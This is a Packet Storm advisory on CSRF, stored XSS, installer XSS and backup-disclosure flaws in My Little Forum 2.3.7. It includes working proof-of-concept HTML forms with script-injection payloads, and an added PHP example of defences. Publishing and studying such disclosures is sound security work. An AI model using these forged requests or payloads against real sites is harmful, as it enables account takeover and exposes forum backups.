My Little Forum 2.3.7 Cross Site Request Forgery / Cross Site Scripting

2016-11-01T00:00:00
ID PACKETSTORM:139462
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2016-11-01T00:00:00

Description

                                        
Title:  
======  
My Little Forum 2.3.7 - Multiple Vulnerabilities  
  
  
Product & Service Introduction:  
===============================  
My little forum is a simple PHP and MySQL based internet forum that   
displays the messages in classical threaded view (tree structure). It is   
Open Source licensed under the GNU General Public License. The main   
claim of this web forum is simplicity. Furthermore it should be easy to   
install and run on a standard server configuration with PHP and MySQL.  
  
  
Software Link:  
==============  
https://github.com/ilosuna/mylittleforum/archive/master.zip  
  
  
Vulnerability Type:  
=========================  
Cross-Site Request Forgery  
Stored Cross-Site Scripting  
CSRF Leading to Backup Disclosure  
  
  
Vulnerability Details:  
==============================  
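This web application is affected by multiple vulnerabilities: admin actions  
can be triggered through cross-site request forgery, page fields allow stored  
cross-site scripting, and a forged request can expose the backup folder.  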
  
  
Severity Level:  
===============  
High  
  
  
Proof of Concept (PoC):  
=======================  
1. CSRF (Add Page)  
This forged request adds a page to the web application.  
<form   
action="http://localhost/mylittleforum-master/index.php?mode=admin&action=edit_page"   
method="post" accept-charset="utf-8">  
<input type="hidden" name="mode" value="admin">  
<input type="hidden" name="title" value="Title">  
<input type="hidden" name="content" value="Content">  
<input type="hidden" name="menu_linkname" value="Name">  
<input type="submit" name="edit_page_submit" value="OK - Save page">  
</form>  
  
  
2. Stored XSS:  
<form   
action="http://localhost/mylittleforum-master/index.php?mode=admin&action=edit_page"   
method="post" accept-charset="utf-8">  
<input type="hidden" name="mode" value="admin">  
<input type="hidden" name="title" value="Stored XSS   
<script>alert(1)</script>">  
<input type="hidden" name="content" value="Stored XSS   
<script>alert(2)</script>">  
<input type="hidden" name="menu_linkname" value="Stored XSS   
<script>alert(3)</script>">  
<input type="submit" name="edit_page_submit" value="OK - Save page">  
</form>  
  
3. Backup Disclosure:  
This forged request deletes the .htaccess file in the backup folder, which  
makes the backups accessible.  
<form action="http://localhost/mylittleforum-master/index.php"   
method="post" accept-charset="utf-8">  
<div>  
<input type="hidden" name="mode" value="admin">  
<input type="hidden" name="delete_backup_files[]" value=".htaccess">  
<input type="submit" name="delete_backup_files_confirm" value="OK - Delete">  
</div>  
</form>  
After the request has been submitted, go to:  
http://localhost/mylittleforum-master/backup/  
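
Added example (not part of the original advisory and not My Little Forum's own code): server-side checks that would refuse the three forged requests above, namely a per-session CSRF token, output encoding of page fields, and an allow-list for backup deletion. The function names, the csrf_token field and the assumption that backups are .sql files with simple names are hypothetical; the other parameter names are taken from the PoC forms.

```php
<?php
// Added example, not My Little Forum's code. Function names and the
// "csrf_token" field are hypothetical; other parameter names come from the PoC forms.

// Issue one random token per session; embed it in every admin form as a hidden field.
function csrf_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Accept a state-changing admin POST only if it carries the session's token (PoC 1 and 3).
function csrf_valid(array $session, array $post): bool {
    return isset($session['csrf_token'], $post['csrf_token'])
        && is_string($post['csrf_token'])
        && hash_equals($session['csrf_token'], $post['csrf_token']);
}

// Encode page and installer fields on output so stored markup is shown as text (PoC 2).
function e(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Keep only names that look like backup dumps (assumption: simple *.sql names),
// so ".htaccess" and path traversal entries are never passed to the delete step (PoC 3).
function deletable_backups(array $requested): array {
    return array_values(array_filter($requested, function ($name) {
        return is_string($name) && preg_match('/\A[A-Za-z0-9_-]+\.sql\z/', $name) === 1;
    }));
}

// Constructed requests: the forged POST from PoC 3, then a same-site POST with the token.
$session = [];
$token   = csrf_token($session);
$forged  = ['mode' => 'admin', 'delete_backup_files' => ['.htaccess'],
            'delete_backup_files_confirm' => 'OK - Delete'];
$genuine = ['mode' => 'admin', 'csrf_token' => $token,
            'delete_backup_files' => ['backup_2016.sql', '.htaccess', '../index.php']];

var_dump(csrf_valid($session, $forged));   // forged request without a token
var_dump(csrf_valid($session, $genuine));  // request carrying the session token
print_r(deletable_backups($genuine['delete_backup_files']));
echo e('Stored XSS <script>alert(1)</script>'), "\n";
```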
  
  
  
Author:  
==================  
Ashiyane Digital Security Team  
  
  
=======================  
  
Title:  
======  
My Little Forum 2.3.7 (Installer) - Cross-Site Scripting  
  
  
Product & Service Introduction:  
===============================  
My little forum is a simple PHP and   
MySQL based internet forum that displays the messages in classical threaded view   
(tree structure). It is Open Source licensed under the GNU General   
Public License. The main claim of this web forum is simplicity.   
Furthermore it should be easy to install and   
run on a standard server configuration with PHP and MySQL.  
  
  
Software Link:  
==============  
https://github.com/ilosuna/mylittleforum/archive/master.zip  
  
  
Vulnerability Type:  
=========================  
Cross-Site Scripting  
  
  
Vulnerability Details:  
==============================  
The installer of My Little Forum is vulnerable to cross-site scripting.  
  
  
Proof of Concept (PoC):  
=======================  
<html>  
<body>  
<form action="http://localhost/mylittleforum-master/install/index.php"   
method="post">  
<input type="text" name="forum_name" value='"><script>alert(1)</script>'>  
<input type="text" name="forum_address" value='"><script>alert(2)</script>'>  
<input type="text" name="forum_email" value='"><script>alert(3)</script>'>  
<input type="text" name="admin_name" value='"><script>alert(4)</script>'>  
<input type="text" name="admin_email" value='"><script>alert(5)</script>'>  
<input type="text" name="host" value='"><script>alert(6)</script>'>  
<input type="text" name="database" value='"><script>alert(7)</script>'>  
<input type="text" name="user" value='"><script>alert(8)</script>'>  
<input type="text" name="table_prefix" value='"><script>alert(9)</script>'>  
<input type="submit" name="install_submit" value="OK - Install forum">  
<input type="hidden" name="language_file" value="english.lang">  
</form>  
</body>  
</html>  
  
  
  
Author:  
==================  
Ashiyane Digital Security Team  
  